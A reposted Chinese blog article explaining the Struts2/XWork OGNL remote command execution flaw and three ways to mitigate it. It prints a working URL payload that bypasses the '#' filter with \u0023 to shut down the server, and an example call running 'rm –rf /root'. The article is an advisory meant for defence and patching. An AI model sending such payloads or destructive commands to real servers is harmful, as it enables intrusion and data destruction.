主題:Struts2/XWork 安全漏洞及解決辦法(轉)

原創 iteye_1159 2020-06-17 08:41

exploit-db網站在7月14日爆出了一個Struts2的遠程執行任意代碼的漏洞。
漏洞名稱:Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability
相關介紹:

  • http://www.exploit-db.com/exploits/14360/
  • http://sebug.net/exploit/19954/


Struts2的核心是使用的webwork框架,處理 action時通過調用底層的getter/setter方法來處理http的參數,它將每個http參數聲明爲一個ONGL(這裏是ONGL的介紹)語句。當我們提交一個http參數:

Java代碼 複製代碼
  1. ?user.address.city=Bishkek&user['favoriteDrink']=kumys  
?user.address.city=Bishkek&user['favoriteDrink']=kumys


ONGL將它轉換爲:

Java代碼 複製代碼
  1. action.getUser().getAddress().setCity("Bishkek")   
  2. action.getUser().setFavoriteDrink("kumys")   
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")


這是通過ParametersInterceptor(參數過濾器)來執行的,使用用戶提供的HTTP參數調用 ValueStack.setValue()。
爲了防範篡改服務器端對象,XWork的ParametersInterceptor不允許參數名中出現“#”字符,但如果使用了Java的 unicode字符串表示\u0023,攻擊者就可以繞過保護,修改保護Java方式執行的值:
此處代碼有破壞性,請在測試環境執行,嚴禁用此種方法進行惡意攻擊

Java代碼 複製代碼
  1. ?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1  
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\[email protected]@getRuntime()))=1


轉義後是這樣:

Java代碼 複製代碼
  1. ?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1  
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#[email protected]@getRuntime()))=1


OGNL處理時最終的結果就是

Java代碼 複製代碼
  1. java.lang.Runtime.getRuntime().exit(1);  
java.lang.Runtime.getRuntime().exit(1);


類似的可以執行

Java代碼 複製代碼
  1. java.lang.Runtime.getRuntime().exec("rm –rf /root")  
java.lang.Runtime.getRuntime().exec("rm –rf /root")

,只要有權限就可以刪除任何一個目錄。
目前嘗試了3個解決方案:

1.升級到struts2.2版本。
這個可以避免這個問題,但是struts開發團隊沒有release這個版本(包括最新的2.2.1版本都沒有release),經我測試發現新版本雖然解決了上述的漏洞,但是新的問題是strus標籤出問題了。

Java代碼 複製代碼
  1. <s:bean id="UserUtil" name="cn.com.my_corner.util.UserUtil"></s:bean>   
  2. <s:property value="#UserUtil.getType().get(cType.toString())" />   
<s:bean id="UserUtil" name="cn.com.my_corner.util.UserUtil"></s:bean>
<s:property value="#UserUtil.getType().get(cType.toString())" />


這樣的標籤在struts2.0中是可以使用的,但是新版中就不解析了,原因就是“#”的問題導致的,補了漏洞,正常的使用也用不了了。
所以sebug網站上的建議升級到2.2版本是不可行的。

2.struts參數過濾。

Java代碼 複製代碼
  1. <interceptor-ref name="params">   
  2. <param name="excludeParams">.*\\u0023.*</param>   
  3. </interceptor-ref>  
<interceptor-ref name="params">
<param name="excludeParams">.*\\u0023.*</param>
</interceptor-ref>


這個可以解決漏洞問題,缺點是工作量大,每個項目都得改struts配置文件。如果項目裏,是引用的一個類似global.xml的配置文件,工作量相應減少一些。

3.在前端請求進行過濾。
比如在ngnix,apache進行攔截,參數中帶有\u0023的一律視爲攻擊,跳轉到404頁面或者別的什麼頁面。這樣做的一個前提就是沒人把#號轉碼後作爲參數傳遞。

目前來看後兩種是比較有效的方法,採用第三種方法比較簡便。是否有另外的解決辦法,歡迎大家討論。

我並沒有在windows環境下測試,有同學在windows下沒有試驗成功,這並不能說明windows下就沒有風險可能是我們的參數或者什麼地方有問題而已。既然漏洞的確存在,咱們就要重視對吧。歡迎大家測試,是否windows下漏洞不能執行成功。

 

原文地址:http://www.iteye.com/topic/720209

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

mybatis開啓MapperScannerConfigurer導致properties不生效

背景 spring和mybatis集成過程中,我們可以通過MapperFactoryBean的方式配置Mapper接口。但是這樣需要在配置文件中,爲每個mapper配置相同的代碼塊,浪費時間。關鍵對於代碼潔癖的人來說,一點不能忍。 <bea

原創 2024-02-07 13:55:41

Java字符串的一些理解

爲什麼要研究字符串? 人機交互的過程中,文字、數字、字母、符號都是字符表現形式,這部分內容佔了人機信息交互的大部分內容,所以有必要明確一些基本問題。因此大部分數據類型都應該有字符串表達形式,我們在定義新類型的時候可以根據需要來定義新類型的

原創 2023-10-31 09:11:32

(二)java版spring boot 社交電子商務平臺-security簡單使用

security的簡單原理: 使用衆多的攔截器對url攔截,以此來管理權限。但是這麼多攔截器,不可能對其一一來講,主要講裏面核心流程的兩個。 首先,權限管理離不開登陸驗證的,所以登陸驗證攔截器AuthenticationProcessing

原創 2023-10-10 11:05:06

(三)java版spring cloud+spring boot+redis多租戶社交電子商務平臺-Spring Cloud實戰隨機端口

我們經常會需要啓動多個實例的情況來測試註冊中心、配置中心等基礎設施的高可用,也會用來測試客戶端負載均衡的調用等。但是,我們一個應用只能有一個端口號,這就使得在本機測試的時候,不得不爲同一個服務設置不同的端口來進行啓動。 在本地用不同端口啓動

原創 2023-10-10 11:05:04

如何使用 Java 反射?反射的用法及案例

簡介     Java Reflection,稱爲 Java 反射,是Java基礎部分的一個比較難的點。Reflection(反射)是被視爲動態語言的關鍵,通過反射機制,我們可以在運行時(runtime)獲取類的完整結構。例如,可以獲取到

原創 2023-10-10 02:23:57

最新美團面試集合(一面+二面+三面+重點技術面試題)附面試解析

一面 1. 簡短自我介紹 2. 事務的ACID,其中把事務的隔離性詳細解釋一遍 3. 髒讀、幻影讀、不可重複讀 4. 紅黑樹、二叉樹的算法 5. 平常用到哪些集合類?ArrayList和LinkedList區別?HashMap內部數據結構

原創 2023-10-10 01:43:49

Java程序員不想被裁員困擾,應該怎樣築基、發展才能越走越遠?

  當我們站在技術之路的原點,未來可能充滿了迷茫,也存在着很多不同的可能。在這個知識爆炸與終身學習/碎片化學習爲主的時代,我們面臨的問題之一就是如何進行有效學習,不僅能有效平衡廣度與深度,並且能真正的積澱下來,提升自己的研發效能。於筆者而

原創 2023-10-10 01:43:34

阿里巴巴Java開發手冊 梳理筆記 - finally 塊必須對資源對象、流對象進行關閉

阿里巴巴Java開發手冊 梳理筆記 - finally 塊必須對資源對象、流對象進行關閉 規約內容: 2.1 異常處理 6. 【強制】 finally 塊必須對資源對象、流對象進行關閉,有異常也要做 try - catch 。 說明:如果

原創 2023-08-02 10:29:06

java併發-CAS的理解

在Java方面,能夠實現多線程安全修改對象值得方法只有2個 1.原子操作 2.互斥方法 而在Java當中,或是其他語言中,基本上也都是使用CAS實現。CAS是比較並交換的意思,這個操作包含2個連續的操作,比較,還有賦值,因爲2個操作在cpu

原創 2023-05-29 01:40:21

java併發-Timer類的使用和原理

單線程輪詢並執行任務,有可能會導致飢餓。比較適合於一些具有一個任務的週期調度。 任務列表用數組存儲,元素最前面的元素是最先被執行的任務。 schedule方法是固定間隔執行,根據上一次執行的結束時間來定義間隔的開始時間 scheduleAt

原創 2023-03-28 01:52:22

java併發-ReadWriteLock代碼理解

創建的ReadWriteLock需要使用兩個方法來繼續創造2個對象,分別是ReadLock和WriteLock。 這兩個鎖對象的方法調用都會匯聚到ReadWriteLock的Sync類中。多個對象的方法調用匯聚到一個對象上面,這個設計模式是

原創 2023-03-28 01:52:20

java併發-synchronized關鍵字

synchronized關鍵字可以修飾普通方法,靜態方法,當修飾普通方法,鎖對象是當前對象,當修飾靜態方法,鎖對象是當前類的class synchroinzed關鍵字可以使用同步代碼塊實現同步,此時可以指定鎖對象。 同步方法的實現方式 同步

原創 2023-03-28 01:52:18

java併發-AQS總結-原理

AQS是Java多線程編程的重入鎖,管程,工具類的基礎類,是必須要掌握的。不掌握這個類,根本不能稱之爲合格的Java程序員。 即使是把這個類所有的代碼都背會,也是值得的。 如何標識已經有線程在執行呢? 有兩個變量,一個state變量,一個e

原創 2023-03-28 01:52:16

java併發-緩存一致性協議和內存屏障的思考和理解

################這是之前的思考 內存屏障只是保證清空流水線,如何保證高速緩存的內容更新到最新或刷新到主存呢?這個問題突然想到了,不知道這個需要怎回答。 內存屏障保證的CPU執行執行序列能夠順序執行,而不是亂序執行。當然,前提

原創 2023-03-28 01:52:14

Java併發-volidate關鍵字

使用volidate關鍵字修飾的成員變量,保證可見性,也就是當一個線程修改這樣的成員變量後,其他的線程能夠立即看到這次的修改。有兩個方面的原因: 1.編譯器不優化對這樣的關鍵字修飾變量的一些訪問操作 2.對讀,寫這個關鍵字修飾的變量前後,會

原創 2023-03-28 01:52:13